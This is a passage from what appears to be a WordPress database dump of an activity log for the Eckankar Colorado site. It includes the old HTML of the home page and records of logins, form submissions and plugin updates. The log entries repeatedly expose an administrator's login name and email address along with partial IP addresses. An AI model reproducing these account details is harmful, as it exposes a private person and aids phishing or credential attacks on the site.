Posner</a>.</cite>'),(241894,41087,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(241895,41087,'plugin_version','4.2.6'),(241896,41087,'plugin_url','https://patrickposner.dev'),(241897,41087,'_message_key','plugin_deactivated'),(241898,41087,'_user_id','2'),(241899,41087,'_user_login','S8zhaBda'),(241900,41087,'_user_email','nada@zipnadanot.org'),(241901,41087,'_server_remote_addr','76.130.120.x'),(241902,41087,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241903,41088,'post_id','7160'),(241904,41088,'post_type','page'),(241905,41088,'post_title','Home'),(241906,41088,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241868,41084,'_message_key','post_updated'),(241869,41084,'_user_id','2'),(241870,41084,'_user_login','S8zhaBda'),(241871,41084,'_user_email','nada@zipnadanot.org'),(241872,41084,'_server_remote_addr','76.130.120.x'),(241873,41084,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241874,41085,'_user_id','2'),(241875,41085,'_user_login','S8zhaBda'),(241876,41085,'_user_email','nada@zipnadanot.org'),(241877,41085,'_message_key','user_logged_out'),(241878,41085,'_server_remote_addr','76.130.120.x'),(241879,41085,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(241880,41086,'user_id','2'),(241881,41086,'user_email','nada@zipnadanot.org'),(241882,41086,'user_login','S8zhaBda'),(241883,41086,'_user_id','2'),(241884,41086,'_user_login','S8zhaBda'),(241885,41086,'_user_email','nada@zipnadanot.org'),(241886,41086,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241887,41086,'_message_key','user_logged_in'),(241888,41086,'_server_remote_addr','76.130.120.x'),(241889,41086,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241999,41102,'user_id','2'),(242000,41102,'user_email','nada@zipnadanot.org'),(242001,41102,'user_login','S8zhaBda'),(242002,41102,'_user_id','2'),(242003,41102,'_user_login','S8zhaBda'),(242004,41102,'_user_email','nada@zipnadanot.org'),(242005,41102,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242006,41102,'_message_key','user_logged_in'),(242007,41102,'_server_remote_addr','76.130.120.x'),(242008,41102,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242009,41103,'_user_id','2'),(242010,41103,'_user_login','S8zhaBda'),(242011,41103,'_user_email','nada@zipnadanot.org'),(242012,41103,'_message_key','user_logged_out'),(242013,41103,'_server_remote_addr','76.130.120.x'),(242014,41103,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=nf-submissions&form_id=61'),(242015,41104,'post_id','269382'),(242016,41104,'post_type','nf_sub'),(242017,41104,'post_title',''),(242018,41104,'_message_key','post_updated'),(242019,41104,'_server_remote_addr','71.205.145.x'),(242020,41104,'_server_http_referer','https://eckankar-colorado.org/update-email-or-mail-address-public/'),(242021,41105,'post_id','269383'),(242022,41105,'post_type','nf_sub'),(242023,41105,'post_title',''),(242024,41105,'_message_key','post_updated'),(242025,41105,'_server_remote_addr','97.122.225.x'),(242026,41105,'_server_http_referer','https://eckankar-colorado.org/resa-faq/update-email-mail/'),(242027,41106,'plugin_name','Autoptimize'),(242028,41106,'plugin_current_version','3.1.9'),(242029,41106,'plugin_new_version','3.1.10'),(242030,41106,'_message_key','plugin_update_available'),(242031,41106,'_server_remote_addr','173.231.231.x'),(242032,41107,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(242033,41107,'plugin_current_version','3.1.1'),(242034,41107,'plugin_new_version','3.1.2'),(242035,41107,'_message_key','plugin_update_available'),(242036,41107,'_server_remote_addr','173.231.231.x'),(242037,41108,'user_id','2'),(242038,41108,'user_email','nada@zipnadanot.org'),(242039,41108,'user_login','S8zhaBda'),(242040,41108,'_user_id','2'),(242041,41108,'_user_login','S8zhaBda'),(242042,41108,'_user_email','nada@zipnadanot.org'),(242043,41108,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(242044,41108,'_message_key','user_logged_in'),(242045,41108,'_server_remote_addr','76.130.120.x'),(242046,41108,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242047,41109,'plugin_slug','autoptimize'),(242048,41109,'plugin_name','Autoptimize'),(242049,41109,'plugin_title','<a href=\"https://autoptimize.com/pro/\">Autoptimize</a>'),(242050,41109,'plugin_description','Makes your site faster by optimizing CSS, JS, Images, Google fonts and more. <cite>By <a href=\"https://autoptimize.com/pro/\">Frank Goossens (futtta)</a>.</cite>'),(242051,41109,'plugin_author','<a href=\"https://autoptimize.com/pro/\">Frank Goossens (futtta)</a>'),(242052,41109,'plugin_version','3.1.10'),(242053,41109,'plugin_url','https://autoptimize.com/pro/'),(242054,41109,'plugin_prev_version','3.1.9'),(242055,41109,'_message_key','plugin_bulk_updated'),(242056,41109,'_user_id','2'),(242057,41109,'_user_login','S8zhaBda'),(242058,41109,'_user_email','nada@zipnadanot.org'),(242059,41109,'_server_remote_addr','76.130.120.x'),(242060,41109,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242061,41110,'plugin_slug','code-snippets'),(242062,41110,'plugin_name','Code Snippets'),(242063,41110,'plugin_title','<a href=\"https://codesnippets.pro\">Code Snippets</a>'),(242064,41110,'plugin_description','An easy, clean and simple way to run code snippets on your site. No need to edit to your theme&#8217;s functions.php file again! <cite>By <a href=\"https://codesnippets.pro\">Code Snippets Pro</a>.</cite>'),(242065,41110,'plugin_author','<a href=\"https://codesnippets.pro\">Code Snippets Pro</a>'),(242066,41110,'plugin_version','3.6.2'),(242067,41110,'plugin_url','https://codesnippets.pro'),(242068,41110,'plugin_prev_version','3.6.1'),(242069,41110,'_message_key','plugin_bulk_updated'),(242070,41110,'_user_id','2'),(242071,41110,'_user_login','S8zhaBda'),(242072,41110,'_user_email','nada@zipnadanot.org'),(242073,41110,'_server_remote_addr','76.130.120.x'),(242074,41110,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242075,41111,'plugin_slug','fluentform'),(242076,41111,'plugin_name','Fluent Forms'),(242077,41111,'plugin_title','<a href=\"https://wpmanageninja.com/wp-fluent-form/\">Fluent Forms</a>'),(242078,41111,'plugin_description','Contact Form By Fluent Forms is the advanced Contact form plugin with drag and drop, multi column supported form builder plugin <cite>By <a href=\"https://fluentforms.com\">Contact Form - WPManageNinja 